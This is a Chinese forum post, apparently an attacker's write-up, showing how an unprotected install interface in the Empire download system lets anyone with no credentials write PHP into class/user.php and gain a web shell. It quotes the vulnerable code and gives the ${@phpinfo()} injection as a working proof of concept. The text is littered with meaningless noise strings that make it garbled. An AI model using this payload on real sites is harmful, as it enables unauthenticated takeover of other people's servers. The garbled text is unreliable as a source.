这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
$ F. \5 s/ d+ n( M% b
& w) ^; G7 u3 ^$ G3 w# p6 Y+ I# k1 m6 ^! ^2 ^+ W* P( L0 i
这是帝国的一套下载系统 如图, d! x) }; r! n+ t
ps(不需要任何账户和密码,直接写shell)
+ B [4 F |" ?: h# h) I由于很多站是由于下载要整合discuz 等等一些论坛....
( L4 X; h7 S) I; ~: `9 N# s
$ d( Q4 d- v5 G- W1 u而帝国他又有一个万能接口,如图 0 I+ e) |, N; C5 z, f
, ~! l7 ~) Z+ l9 V
% r8 h* k3 X1 m$ T: f6 ~
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
. A+ L" K- q5 G7 v4 Z: G- ~4 t( n
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
/ O1 G; B3 y* L: H/ x+ m! ?' F" P) T2 a5 {: {7 N6 N
在data/fun.php中的15行/ w$ S4 [2 L4 _; C
2 q' X: o' P1 \! C7 q我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {4 b( O$ {6 w( R9 z: |
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
1 V/ B6 n; ~9 l0 i
: a4 Y- L2 A/ K. l这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);7 q, t9 U" d( L5 z/ |
+ ~# @3 B! ~& m6 v+ g5 Q4 w4 O他将传进来的变量进行了切割,然后赋给了$filetext
! I2 O& R' C" t6 p
~4 y3 ~* X8 a: {" O然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了: [* P3 A/ F3 x9 S
- d+ u' Z9 q9 h6 P% B" |
我们看看写入的结果,随便填一个 1 O( Z) T- K) i
5 t, _- D- ]6 x! f6 ?& C/ L9 b( A: {* h0 f3 e7 @) }
# K% b! o# I4 C4 k
4 c$ ~, W) d+ \. e- Y4 `8 N+ l* s$ d- c
: L& H- V) c! w* y7 K6 Q$ D0 S7 r6 a [$ y7 ?9 ~* S% }
, U1 s* h n. v. u; B. D i
6 h. c* [* n5 u0 d; J+ ?* D% n1 X5 j$ N& X) [
8 X/ S* P0 ~! U; s
: W% l& r4 z, I# U
5 {4 M' ]+ V+ H3 v! B
' ^- p: ], @) w, k: N8 V
. _1 ?" j0 e8 v2 N
' d/ q. e0 b. O
4 R' r) [6 {1 M" }
2 \' \& M3 r( f( D2 U3 S1 {, g8 y8 y. |, q$ u3 z
% W9 J/ {- c% t. d' B& w
& s, l2 _2 j8 k) w; \' q, G
1 ^8 E8 Y8 k( r$ @% d所以我们淫荡点,写个${@phpinfo()}试试
0 t$ k) K. s P' j Y* j0 L+ u然后访问以下class/user.php这个文件; G5 A$ a. [: C: u8 }' K- A
日了吧
* a" f( {$ {1 N: V" c: K8 m8 d4 ]! B$ ~7 |, P% f
' g$ C" S+ U+ O, f
/ W5 d) z# w! P0 d% C8 |) Z/ P
T8 D5 N* l- z( e- I5 f1 k/ Z5 A* V, O W2 l7 g; k+ G
|